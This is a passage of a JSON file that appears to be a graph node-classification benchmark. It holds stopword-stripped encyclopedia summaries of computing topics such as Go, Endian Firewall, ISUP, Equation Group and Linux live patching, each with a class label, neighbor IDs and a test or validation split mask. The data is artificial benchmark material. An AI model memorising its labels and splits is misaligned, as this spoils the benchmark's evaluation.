codice_44 enables code autocompletion many text editors codice_45 go team member automatically adds/removes package imports needed codice_46 detects code might unintentionally ignore errors plugins exist adding language support several text editors several ides available including liteide simple open source cross-platform go ide goland claims capable ergonomic package main import fmt func main fmt package formatted i/o similar c c file input/output following simple program demonstrates go concurrency features implement asynchronous program launches two lightweight threads goroutines one waits user type text implements timeout statement waits either goroutines send message main routine acts first message arrive example adapted david chisnall book package main import func readword ch chan string func timeout chan bool func main notable open-source applications written go include notable companies sites using go generally together languages exclusively include interface system deliberate omission inheritance praised michele simionato likened characteristics standard ml calling shame popular language followed particular route dave astels engine yard wrote go named programming language year tiobe programming community index first year 2009 larger 12-month increase popularity 2 months introduction november language year reached 13th place january 2010 surpassing established languages like pascal june 2015 ranking dropped 50th index placing lower cobol fortran january 2017 ranking surged 13th indicating significant growth popularity adoption go awarded tiobe programming language year 2016 bruce eckel stated 2011 evaluation language implementation comparison c++ gcc java scala google engineer found evaluation got rebuttal go development team ian lance taylor improved go code hundt paper aware intention publish code says version never intended example idiomatic efficient go russ cox optimized go code well c++ code got go code run slightly faster c++ order magnitude faster code paper november 10 2009 day general release language francis mccabe developer go programming language note exclamation point requested name change google language prevent confusion language spent 10 years developing mccabe raised concerns 'big guy end steam-rollering concern resonated 120 developers commented google official issues thread saying change name even saying issue contradicts google motto n't evil october 12 2010 issue closed google developer russ cox rsc custom status unfortunate accompanied following comment many computing products services named go 11 months since release minimal confusion two languages go critics assert designers argue omissions simplifications make language better see",
    "neighbors": [
      4096,
      10752,
      5635,
      3076,
      9224,
      4623,
      3600,
      6160,
      8719,
      1556,
      7700,
      10776,
      9244,
      3613,
      9245,
      6176,
      6184,
      10284,
      2605,
      4141,
      5165,
      5677,
      3633,
      1586,
      5684,
      11317,
      1591,
      9272,
      6718,
      1087,
      10819,
      5700,
      8262,
      4683,
      11343,
      3664,
      6228,
      4182,
      88,
      2138,
      8285,
      5214,
      2656,
      2658,
      4194,
      9828,
      10340,
      1126,
      10854,
      4200,
      9320,
      1130,
      8821,
      3705,
      7292,
      9345,
      9859,
      1156,
      5255,
      7816,
      1673,
      2186,
      4747,
      5262,
      9871,
      6800,
      11408,
      7315,
      10387,
      3734,
      5783,
      10393,
      8858,
      155,
      7326,
      7841,
      8868,
      1191,
      2217,
      4777,
      4268,
      6319,
      7857,
      1203,
      692,
      7347,
      2236,
      6335,
      7359,
      8385,
      4802,
      10432,
      196,
      3269,
      3782,
      5833,
      5834,
      6345,
      10445,
      10447,
      7889,
      3795,
      8916,
      1240,
      8413,
      9949,
      3807,
      6367,
      228,
      10470,
      2283,
      236,
      2795,
      9455,
      10480,
      10991,
      9970,
      7926,
      5879,
      762,
      4859,
      3836,
      2304,
      8701,
      11009,
      5892,
      5383,
      8455,
      11017,
      10506,
      8973,
      10510,
      1813,
      7446,
      10009,
      8986,
      10525,
      798,
      288,
      3876,
      4901,
      7983,
      8495,
      9008,
      823,
      5431,
      7479,
      2875,
      10555,
      10045,
      1349,
      11590,
      11592,
      8524,
      335,
      847,
      3409,
      4433,
      9039,
      9557,
      2903,
      10586,
      8539,
      10075,
      349,
      2910,
      4958,
      5469,
      8545,
      8549,
      6502,
      10086,
      11112,
      11625,
      8554,
      5483,
      5492,
      2936,
      3960,
      6522,
      8057,
      7548,
      10622,
      6016,
      1409,
      4995,
      3462,
      8582,
      9610,
      5521,
      5522,
      1427,
      5524,
      8082,
      10645,
      11161,
      1435,
      6555,
      9631,
      1952,
      10143,
      2978,
      10659,
      7076,
      5029,
      1959,
      5031,
      5546,
      3499,
      428,
      7595,
      11693,
      2481,
      10675,
      6074,
      8126,
      963,
      8644,
      4044,
      4048,
      2003,
      5588,
      11219,
      11221,
      2519,
      4057,
      477,
      7140,
      4069,
      8677,
      6632,
      7147,
      5100,
      6640,
      9712,
      10739,
      7671,
      1016,
      2045,
      8702,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 1436,
    "label": 4,
    "text": "Endian_Firewall:endian firewall endian firewall open-source router firewall gateway security linux distribution developed south tyrolean company endian product available either free software commercial software guaranteed support services hardware appliance including support services endian firewall turnkey linux security distribution independent unified security management operating system endian firewall based hardened linux operating system system installed pc using boot cd operated without monitor online interface via keyboard command-line interface server configured via web interface serial interface main task endian firewall gateway router firewall act proxy web email ftp sip dns four different networks dependent number network cards installed host pc normally managed networks configured web interface endian differentiated color coding endian firewall includes support load balancing means add another connection internet red network endian firewall distributes network load interfaces behind endian firewall italian endian spa appiano south tyrol community volunteer developers helpers license model endian provides commercial version free version current version includes following key features endian firewall fork linux firewall ipcop turn fork smoothwall due numerous developments one-fifth original ipcop code used newer versions based initially linux scratch version 2.2 rhel centos upcoming version 3.0 endian firewall virtually smoothwall- ipcop-free greatest difference ipcop endian firewall merely pure router-firewall combination comprehensive gateway security solution unified threat management virus scanner spam blocker firmly integrated distribution allows transport http ftp pop 3 smtp scanned real-time optionally filtered also menus refined ipcop approach reducing complexity also reducing reconfigurability individual services concerning business model endian different origins smoothwall ipcop follows",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      4611,
      2825,
      1172,
      1814,
      9496,
      3482,
      3742,
      4511,
      6431,
      10531,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      2228,
      2996,
      9909,
      823,
      569,
      4797,
      9279,
      5057,
      1858,
      10433,
      7364,
      11073,
      2118,
      5959,
      5322,
      4814,
      9423,
      11086,
      7121,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      5860,
      3942,
      10344,
      6762,
      10987,
      10732,
      8943,
      8816,
      5363,
      9971,
      4725,
      1273,
      9983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1437,
    "label": 5,
    "text": "ISDN_User_Part:isdn user part isdn integrated services digital network user part isup part signaling system 7 ss7 used set telephone calls public switched telephone network pstn specified itu-t part q.76x series telephone call set one subscriber another several telephone exchanges could involved possibly across international boundaries allow call set correctly isup supported switch signal call-related information like called party number next switch network using isup messages telephone exchanges may connected via t1 e1 trunks transport speech calls trunks divided 64 kbit/s timeslots one timeslot carry exactly one call regardless facilities used interconnect switches circuit two switches uniquely identified circuit identification code cic included isup messages exchange uses information along received signaling information especially called party number determine inbound outbound circuits connected together provide end end speech path addition call related information isup also used exchange status information permit management available circuits case outbound circuit available particular exchange release message sent back preceding switches chain different isup variants exist itu-t specifies variant used international network europe etsi releases isup specification close itu-t. itu-t isup used international connections base national isup variants countries variation isup cover national requirements ansi specifies variations isup utilized north american numbering plan however countries nanp differ support procedures example lata meaningless within canada also rbocs support telcordia procedures fully specified ansi countries outside nanp support ansi-based variants e.g mexico variations isup differ subtle ways vast majority isup message type parameter type parameter field code-points related fundamental call processing procedures agree across variants according itu-t q.761 section 2.4.1 isup interworking isup'92 backwards compatible isup blue book q.767 basic call procedures supplementary services except procedures e.g number portability additionally compatibility features introduced version ensure forward compatibility newer versions isup message contains fixed header containing circuit identification code isup message type followed mandatory fixed-length parameter part mandatory variable-length parameter part optional parameter part dependent type message sent isup messages sent using services message transfer part less often signalling connection control part messages transmitted various stages call setup release common messages basic call flow involving two telecom switches exchange isup messages subscriber interfaces covered listed better understanding detailed exchange isup messages involving two isdn telecom switches report alcatel s12 digital switch release cause codes used identify debug events occurring isdn user part signaling every event isup signaling generates cause code number even normal isup call cause code generated lot applications developed based cause code isup signaling similarly telecom operators trace causecodes debug call failures following list cause codes used cause codes defined number effectively undefined may used proprietary solutions signalling information field sif isup message signal units msu contain following components routing label indicates point codes originating destination nodes network also includes signalling link selection field used select multiple routes msu could take two nodes circuit identification code used specify trunk two switches used carry particular call note versions ansi isup permit cic 14 significant bits instead 12 shown sent using services signalling connection control part isup messages passed sccp user data parameter nsdu consist last 4 components message type mandatory fixed part mandatory variable part optional part routing label circuit identification code included user data passed sccp",
    "neighbors": [
      706,
      4963,
      7811,
      5704,
      7120,
      10864,
      755,
      3156,
      7865,
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 1438,
    "label": 5,
    "text": "Stop_Procrastinating:stop procrastinating stop procrastinating internet website blocking computer software restricts access internet specific websites set amount time avoid limit online distraction become popular tool students writers home workers self-employed entrepreneurs well parents help control limited children internet use also used extensively men trying break addiction pornography software become notable popular tool students way block internet distraction studying covered extensively national university publications undergraduate student publications reviewed college news visited student online news review website us recommended best internet blocker market influential college publications leading us universities georgia iowa arizona confirmed software popular appeal become essential tool students study undistracted internet citing downloads 12,000 weeks stop procrastinating also recognised influential extensive independent research impact internet recent influential study undertaken thousands parents became international headline news shown parents face dilemma parents felt could n't prevent children using internet despite evidence affects concentration needed study issue concern parents educational authorities move internet based learning seen encourage greater internet use children issue covered in-depth headline news judith burns expert educational correspondent bbc one world reputable news outlets extensive research internet significantly lowers productivity employees work covered national newspaper outlets across world including uk daily telegraph spain el pais read newspaper spanish software allows users set time one minute 24 hours chose one three options block internet time period selected one option allows users block internet connection completely reconnect internet restarting computer time completed second option prevents users getting back online time even restart software offers third option called blacklist users list websites wish block thus still access internet connection except websites listed set group freelance writers programmers claim needed develop tool help cut online distraction application described helping students writers self-employed workers businesses office workers teenagers want block internet order complete homework parental control stop procrastinating originally called webtrate changed name stop procrastinating november 2014 software designed used windows apple mac computers",
    "neighbors": [
      6797,
      5407
    ],
    "mask": "Test"
  },
  {
    "node_id": 1439,
    "label": 2,
    "text": "Migration_Assistant_(Apple):migration assistant apple migration assistant utility apple inc. transfers data user accounts computer settings apps one macintosh computer another computer full drive backup os x lion later also migrate contacts calendars email accounts files microsoft windows migration assistant used initial setup new computer run manually system already set may used multiple times copy applications user account settings primary purpose duplicate contents configuration existing computer user account new one migration assistant transfer operating system old computer new one similarly applications utilities bundled apple operating system e.g safari transferred based assumption newer machine newer version already installed however settings applications e.g bookmarks transferred",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      6797,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      6037,
      9109,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1440,
    "label": 4,
    "text": "Equation_Group:equation group equation group classified advanced persistent threat highly sophisticated threat actor suspected tied tailored access operations tao unit united states national security agency nsa kaspersky labs describes one sophisticated cyber attack groups world advanced ... seen operating alongside always position superiority creators stuxnet flame targets iran russia pakistan afghanistan india syria mali name equation group chosen group predilection sophisticated encryption methods operations 2015 kaspersky documented 500 malware infections group least 42 countries acknowledging actual number could tens thousands due self-terminating protocol 2017 wikileaks published discussion held within cia possible identify group one commenter wrote equation group labeled report relate specific group rather collection tools used hacking kaspersky security analysts summit held mexico february 16 2015 kaspersky lab announced discovery equation group according kaspersky lab report group active since least 2001 60 actors malware used operations dubbed equationdrug grayfish found capable reprogramming hard disk drive firmware advanced techniques involved high degree covertness group suspected ties nsa kaspersky lab identified actors behind group 2015 kaspersky research findings equation group noted loader grayfish similarities previously discovered loader gauss another attack series separately noted equation group used two zero-day attacks later used stuxnet researchers concluded similar type usage exploits together different computer worms around time indicates equation group stuxnet developers either working closely together also identified platform times spread interdiction interception legitimate cds sent scientific conference organizer mail platform unprecedented ability infect transmitted hard drive firmware several major hard drive manufacturers create use hidden disk areas virtual disk systems purposes feat would require access manufacturer source code achieve tool designed surgical precision going far exclude specific countries ip allow targeting specific usernames discussion forums nsa codewords straitacid straitshooter found inside malware addition timestamps malware seem indicate programmers worked overwhelmingly monday–friday would correspond 08:00–17:00 workday eastern united states timezone.the kaspersky report discounted possibility timestamps intentionally manipulated since years listed various executable files appeared match availability computer platforms files ran kaspersky global research analysis team otherwise known great claimed found piece malware contained stuxnet privlib 2008 specifically contained lnk exploit found stuxnet 2010 fanny classified worm affects certain windows operating systems attempts spread laterally via network connection usb storage kaspersky stated suspect recorded compile time fanny equation group around longer stuxnet f-secure claims equation group malicious hard drive firmware tao program iratemonk one items nsa ant catalog exposed 2013 der spiegel article iratemonk provides attacker ability software application persistently installed desktop laptop computers despite disk formatted data erased operating system re-installed infects hard drive firmware turn adds instructions disk master boot record causes software install time computer booted capable infecting certain hard drives seagate maxtor western digital samsung ibm micron technology toshiba august 2016 hacking group calling shadow brokers announced stolen malware code equation group kaspersky lab noticed similarities stolen code earlier known code equation group malware samples possession including quirks unique equation group way implementing rc6 encryption algorithm therefore concluded announcement legitimate recent dates stolen files june 2013 thus prompting edward snowden speculate likely lockdown resulting leak nsa global domestic surveillance efforts stopped shadow brokers breach equation group exploits cisco adaptive security appliances fortinet firewalls featured malware samples released shadow brokers extrabacon simple network management protocol exploit cisco asa software zero-day exploit time announcement juniper also confirmed netscreen firewalls affected eternalblue exploit used conduct damaging worldwide wannacry ransomware attack",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      3133,
      1608,
      3657,
      8779,
      4703,
      8288,
      612,
      8292,
      11368,
      10875,
      3711,
      8320,
      7809,
      5764,
      2187,
      6797,
      4240,
      1688,
      2717,
      3742,
      9375,
      9904,
      9395,
      8886,
      3789,
      7887,
      4304,
      7893,
      4314,
      9435,
      4830,
      3807,
      3299,
      5349,
      1254,
      10477,
      9460,
      7418,
      2811,
      3323,
      2815,
      3841,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      9537,
      10574,
      6484,
      857,
      1882,
      7515,
      3944,
      9068,
      3956,
      9082,
      11152,
      10132,
      5024,
      5028,
      3495,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1441,
    "label": 3,
    "text": "Hi_no_Tori_Hououhen_(MSX):hi tori hououhen msx essence knightmare-like vertical scrolling shooter player viewing character back enemies obstacles entering top screen addition game six stages laid labyrinthine way adding puzzle elements mix order find reach defeat game final boss player would travel back forth various stages obtain large assortment keys keys allow access parts stages even earlier ones traveling stages highly unusual shoot 'em",
    "neighbors": [
      10931
    ],
    "mask": "Test"
  },
  {
    "node_id": 1442,
    "label": 3,
    "text": "Armbian:armbian armbian debian ubuntu based computer operating system arm development boards",
    "neighbors": [
      10016,
      11396,
      8262,
      5067,
      9964,
      6925,
      5363,
      5397,
      7483
    ],
    "mask": "Test"
  },
  {
    "node_id": 1443,
    "label": 7,
    "text": "Wolfram_Research:wolfram research wolfram research private company creates computational technology wolfram flagship product technical computing program wolfram mathematica first released june 23 1988 wolfram research founder stephen wolfram ceo company launched wolfram alpha answer engine may 16 2009 brings new approach knowledge generation acquisition involves large amounts curated computable data addition semantic indexing text wolfram research acquired mathcore engineering ab march 30 2011 july 21 2011 wolfram research launched computable document format cdf cdf electronic document format designed allow easy authoring dynamically generated interactive content june 2014 wolfram research officially introduced wolfram language new general multi-paradigm programming language primary programming language used mathematica products include wolfram systemmodeler wolfram workbench gridmathematica wolfram finance platform webmathematica wolfram development platform wolfram programming lab wolfram research served mathematical consultant cbs television series numb3rs show mathematical aspects crime-solving mathematica modern technical computing system spanning areas technical computing — including neural networks machine learning image processing geometry data science visualizations others system used many technical scientific engineering mathematical computing fields addition computational abilities system mathematica includes unique powerful notebook interface computational notebooks structured using hierarchy cells allow outlining sectioning document support automatic numbering index creation documents presented slideshow environment presentations contents represented mathematica expressions created modified analyzed mathematica programs converted formats wolfram alpha free online service answers factual queries directly computing answer externally sourced curated data rather providing list documents web pages might contain answer search engine might users submit queries computation requests via text field wolfram alpha computes answers relevant visualizations february 8 2012 wolfram alpha pro released offering users additional features e.g. ability upload many common file types data — including raw tabular data images audio xml dozens specialized scientific medical mathematical formats — automatic analysis monthly subscription fee 2016 wolfram alpha enterprise business-focused analytics tool launched program combines data supplied corporation algorithms wolfram alpha answer questions related corporation wolfram systemmodeler platform engineering well life-science modeling simulation based modelica language provides interactive graphical modeling simulation environment customizable set component libraries primary interface modelcenter interactive graphical environment including customizable set component libraries software also provides tight integration mathematica users develop simulate document analyze models within mathematica notebooks announced 2017 annual collision conference wolfram|one provides benefits desktop conveniences technical computing built-in functionality interact wolfram cloud knowledgebase apis one environment available monthly annual subscription model personal professional use personal use subscribers provided features 5,000 wolfram|alpha api calls complimentary upgrades installed two desktop machines additionally subscribers given 2gb cloud storage subscribers professional version given similar features 8,000 wolfram|alpha api calls 15gb cloud storage april 2017 wolfram launched world ’ first computable data repository repository free public resource hosts ever-expanding collection datasets curated structured immediately used wide range analyses data publicly uploaded broad range sources including governments academic researchers business professionals currently datasets exist 30 different categories chemistry economics images machine learning statistics anyone extract datasets within repository various formats accessed analyzed within free wolfram open cloud wolfram challenges free online collection computational thinking problems designed provide users fun interactive method learning using wolfram language challenges range levels difficulty provide opportunity beginners seasoned individual range pure algorithms real-world questions requiring use wolfram knowledgebase mathematics challenge maintains leaderboard tracking various achievements shortest code length fastest time successfully answer names everyone submitted correct answer challenges available mathematica notebook format either downloaded desktop opened directly web browser using wolfram cloud users also given opportunity submit new challenges inclusion program june 14 2018 wolfram research officially launched wolfram neural net repository repository public resource hosts large collection trained untrained neural network models spanning many categories including classification feature extraction image processing regression semantic segmentation speech recognition object detection language modeling may 21 2019 wolfram research launched wolfram engine developers.designed pre-production software development provides developers free access wolfram language knowledgebase engine available download runs locally user ’ computers linux mac windows operating systems license permit output production commercial organizational use production consumer use requires upgraded production license june 11 2019 wolfram function repository officially launched public resource allows anyone contribute functions used wolfram language users opt submit functions required complete detailed documentation—the documentation used functions created wolfram research—to ensure thorough explanation function intended use time official launch repository contained 500 functions across 26 categories wolfram research publishes several free websites including mathworld scienceworld encyclopedias scienceworld launched 2002 divided sites chemistry physics astronomy scientific biography 2005 physics site deemed valuable resource american scientist magazine however 2009 astronomy site said suffer outdated information incomplete articles link rot wolfram demonstrations project collaborative site hosting interactive technical demonstrations powered free mathematica player runtime wolfram research publishes mathematica journal wolfram also published several books via wolfram media wolfram publishing arm wolfram research organized three wolfram science conferences boston washington d.c. burlington vt united states years 2003 2006 2007 respectively two independent nks midwest conferences taken place indiana university bloomington 2005 2008 independent workshops related nks research also organized overseas joual one universal algorithm cnr pisa italy 2009 wolfram research hosts yearly wolfram technology conference champaign il three-day conference developers discuss latest wolfram technologies mobile devices cloud computing interactive deployment wolfram research also hosts wolfram data summit high-level gathering innovators data science experimenting electronic textbook creation wolfram research frequently streams live events twitch.tv events often feature long-time wolfram language users outside company demonstrating benefits language livecoding presentations also featured regularly wolfram research developers demonstrate new functionality features wolfram language personally responsible building",
    "neighbors": [
      6408,
      6797,
      11538,
      7069,
      7326,
      3998,
      9376,
      11555,
      679,
      823,
      1723,
      10557,
      5699,
      5830,
      5319,
      8405,
      219,
      3567,
      4981
    ],
    "mask": "None"
  },
  {
    "node_id": 1444,
    "label": 2,
    "text": "KGraft:kgraft kgraft feature linux kernel implements live patching running kernel allows kernel patches applied kernel still running avoiding need rebooting system new kernel contains desired patches kgraft aims maximize system uptime availability time kgraft allows kernel-related security updates applied without deferring scheduled downtimes internally kgraft allows entire functions running kernel replaced patched versions safely selectively using original versions functions ensure per-process consistency live patching performed kgraft developed suse source code licensed terms versions two three gnu general public license gpl april 2014 kgraft submitted inclusion linux kernel mainline minimalistic foundations live patching merged linux kernel mainline kernel version 4.0 released april 12 2015 internally kgraft consists two parts core kernel module executes live patching mechanism altering kernel inner workings userspace utilities prepare individual hot patch kernel modules source diffs live kernel patching performed function level meaning kgraft replace entire functions running kernel patched versions relying mechanisms infrastructure established ftrace route around old versions functions changes kernel internal data structures possible however security patches one natural candidates used kgraft rarely contain changes kernel data structures applying hot patches kgraft require running kernel stopped patched versions functions introduced instead replacing functions atomically kgraft provides consistent world views universes userspace processes kernel threads interrupt handlers monitored execution original versions patched kernel functions continue used accomplish kgraft maintains original versions patched functions read-copy-update rcu fashion dynamically selects original patched versions depending process kernel thread interrupt handler executes specifically original versions functions continue usedat time hot patch appliedfor processes currently executing within kernel space kernel threads reach completion points currently executing interrupt handlers due design kgraft introduce additional latency applying hot patches downside original versions patched kernel functions may required maintained extended periods time case processes remain long within kernel space example process may wait i/o network socket also original patched versions functions allowed executed parallel troubles may arise use kernel internal data structures different ways suse announced kgraft january 2014 released publicly march 2014 terms gnu general public license version 2 gplv2 kernel part terms version 3 gplv3 userspace part released shortly red hat released live kernel patching implementation called kpatch kgraft aims become merged linux kernel mainline submitted inclusion april 2014. kgraft made available suse linux enterprise server 12 november 18 2014 additional feature called suse linux enterprise live patching minimalistic foundations live kernel patching merged linux kernel mainline kernel version 4.0 released april 12 2015 foundations based primarily kernel ftrace functionality form common core capable supporting hot patching kgraft kpatch providing application programming interface api kernel modules contain hot patches application binary interface abi userspace management utilities however common core included linux kernel 4.0 supports x86 architecture provide mechanisms ensuring function-level consistency hot patches applied since april 2015 ongoing work porting kgraft common live patching core provided linux kernel mainline however implementation required function-level consistency mechanisms delayed call stacks provided linux kernel may unreliable situations involve assembly code without proper stack frames result porting work remains progress attempt improve reliability kernel call stacks specialized sanity-check userspace utility also developed",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      6281,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5823,
      5824,
      9921,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      9455,
      10482,
      5363,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      4423,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      5040,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      4589,
      3055,
      5105,
      499,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 1445,
    "label": 2,
    "text": "Kpatch:kpatch kpatch feature linux kernel implements live patching running kernel allows kernel patches applied kernel still running avoiding need rebooting system new kernel contains desired patches kpatch aims maximize system uptime availability time kpatch allows kernel-related security updates applied without deferring scheduled downtimes internally kpatch allows entire functions running kernel replaced patched versions safely stopping running processes live patching performed kpatch developed red hat source code licensed terms gnu general public license version 2 gplv2 may 2014 kpatch submitted inclusion linux kernel mainline minimalistic foundations live patching merged linux kernel mainline kernel version 4.0 released april 12 2015 internally kpatch consists two parts core kernel module executes live patching mechanism altering kernel inner workings set userspace utilities prepares individual hot patch kernel modules source diffs manages application live kernel patching performed function level meaning kpatch replace entire functions running kernel patched versions using facilities provided ftrace route around old versions functions way hot patches also easily undone changes kernel internal data structures possible however security patches one natural candidates used kpatch rarely contain changes kernel data structures kpatch ensures hot patches applied atomically safely stopping running processes hot patch applied ensuring none stopped processes running inside functions patched approach simplifies whole live patching mechanism prevents certain issues associated way data structures used original patched versions functions downside approach also leaves possibility hot patch fail introduces small amount latency required stopping running processes red hat announced publicly released kpatch february 2014 terms gnu general public license version 2 gplv2 shortly suse released live kernel patching implementation called kgraft kpatch merged linux kernel mainline submitted inclusion may 2014. kpatch included red hat enterprise linux 7.0 released june 10 2014 technology preview minimalistic foundations live kernel patching merged linux kernel mainline kernel version 4.0 released april 12 2015 foundations based primarily kernel ftrace functionality form common core capable supporting hot patching kpatch kgraft providing application programming interface api kernel modules contain hot patches application binary interface abi userspace management utilities however common core included linux kernel 4.0 supports x86 architecture provide mechanisms ensuring function-level consistency hot patches applied since april 2015 ongoing work porting kpatch common live patching core provided linux kernel mainline however implementation required function-level consistency mechanisms delayed call stacks provided linux kernel may unreliable situations involve assembly code without proper stack frames result porting work remains progress attempt improve reliability kernel call stacks specialized sanity-check userspace utility also developed",
    "neighbors": [
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      10785,
      9762,
      6180,
      5158,
      7217,
      8242,
      9266,
      9784,
      10809,
      576,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      10333,
      97,
      6244,
      5222,
      10856,
      8298,
      4207,
      7285,
      9335,
      2168,
      1147,
      5244,
      3197,
      4734,
      1150,
      11391,
      2179,
      7812,
      10883,
      6281,
      6797,
      4238,
      7821,
      10382,
      2195,
      9366,
      2711,
      6296,
      6808,
      9882,
      7325,
      1694,
      9887,
      2723,
      8364,
      3248,
      6837,
      10933,
      5815,
      5822,
      5824,
      9921,
      8388,
      1736,
      2762,
      9932,
      8909,
      5840,
      6352,
      7382,
      8410,
      10971,
      4831,
      8928,
      1761,
      1253,
      2278,
      233,
      7403,
      9455,
      10482,
      5363,
      2294,
      8439,
      2809,
      2811,
      10499,
      4360,
      1291,
      1804,
      4367,
      273,
      11539,
      792,
      10016,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      6988,
      10063,
      5457,
      11601,
      5975,
      11095,
      10590,
      8551,
      10091,
      5492,
      7540,
      8573,
      1406,
      8066,
      900,
      394,
      3978,
      5514,
      4493,
      7057,
      11667,
      9621,
      1431,
      8602,
      8092,
      11678,
      7584,
      1444,
      421,
      9637,
      935,
      4521,
      4011,
      1456,
      5040,
      11184,
      1972,
      6075,
      6078,
      9151,
      9667,
      8136,
      457,
      11221,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      6128,
      5105,
      499,
      2036,
      5619,
      5620,
      8186,
      10235,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 1446,
    "label": 1,
    "text": "Nested_SQL:nested sql relational databases nested table table embedded within another table individual elements inserted updated deleted nested table since individual elements modified nested table flexible array elements array modified whole individually nested table n't maximum size arbitrary number elements stored",
    "neighbors": [
      10737
    ],
    "mask": "Test"
  },
  {
    "node_id": 1447,
    "label": 1,
    "text": "PointBase:pointbase pointbase relational database management system rdbms written java programming language 1998 bruce scott co-founder oracle corporation larry ellison bob miner ed oates started pointbase inc. jeff richey architect sybase daren race written pure java supported dcom corba object-relational database designed integrate internet databases pointbase inc. established san mateo california moved mountain view california like java pointbase aimed portable devices early 2000s database shipped free java platform 2003 database acquired datamirror markham ontario september 2007 ibm acquired datamirror today 2012 pointbase sql engine part oracle weblogic platform shipped oracle weblogic server java ee server pointbase supported design development verification applications supported enterprise-quality deployment evaluation license pointbase database size limit 30 mb",
    "neighbors": [
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      2456,
      1049,
      5658,
      5403,
      9631,
      9634,
      4263,
      2344,
      7080,
      10024,
      5677,
      10286,
      7983,
      9397,
      3004,
      10048,
      5953,
      9286,
      2901,
      10326,
      987,
      2780,
      4065,
      1250,
      9828,
      10471,
      3560,
      5612,
      2669,
      6124,
      6383,
      2544,
      10737,
      9075,
      1146
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1448,
    "label": 9,
    "text": "Clozure_CL:clozure cl clozure cl ccl common lisp implementation implements full ansi common lisp standard several extensions clos mop threads clos conditions clos streams ... contains command line development environment experimental integrated development environment ide mac os x using hemlock editor also used slime common lisp development environment gnu emacs clozure cl open source project hosted clozure associates clozure cl supports mac os x linux freebsd solaris microsoft windows platforms 32 64 bit x86 variants additionally powerpc ports mac os x linux 32-bit arm port linux clozure cl used ita software business logic new airline reservation system clozure cl also commonly used underlying common lisp implementation acl2 theorem prover formerly known openmcl clozure cl evolution macintosh common lisp ccl contains precise generational compacting garbage collector ccl compiler produces native instructions lisp expressions files default every expression entered repl compiled native code lisp threads implemented preemptively-scheduled native operating-system threads ccl implements built-in facilities easily interface c objective-c libraries cocoa bridge used implement ide amongst things ide based upon hemlock editor currently labelled experimental effort underway improve",
    "neighbors": [
      10752,
      11269,
      2062,
      9231,
      9749,
      8728,
      4633,
      4122,
      8226,
      2105,
      6201,
      6717,
      8258,
      8771,
      1613,
      9299,
      3675,
      11361,
      7267,
      8293,
      3176,
      2666,
      2667,
      8303,
      5751,
      7805,
      9865,
      6797,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      7880,
      8908,
      205,
      7896,
      10463,
      7392,
      7904,
      11488,
      9964,
      5360,
      5361,
      8435,
      6906,
      4865,
      3334,
      6919,
      1301,
      10012,
      3869,
      2335,
      7983,
      10547,
      823,
      311,
      6969,
      11083,
      1365,
      3413,
      2392,
      6493,
      10083,
      6502,
      3446,
      4992,
      2438,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      9128,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5612,
      499,
      11255,
      8700,
      4606
    ],
    "mask": "None"
  },
  {
    "node_id": 1449,
    "label": 7,
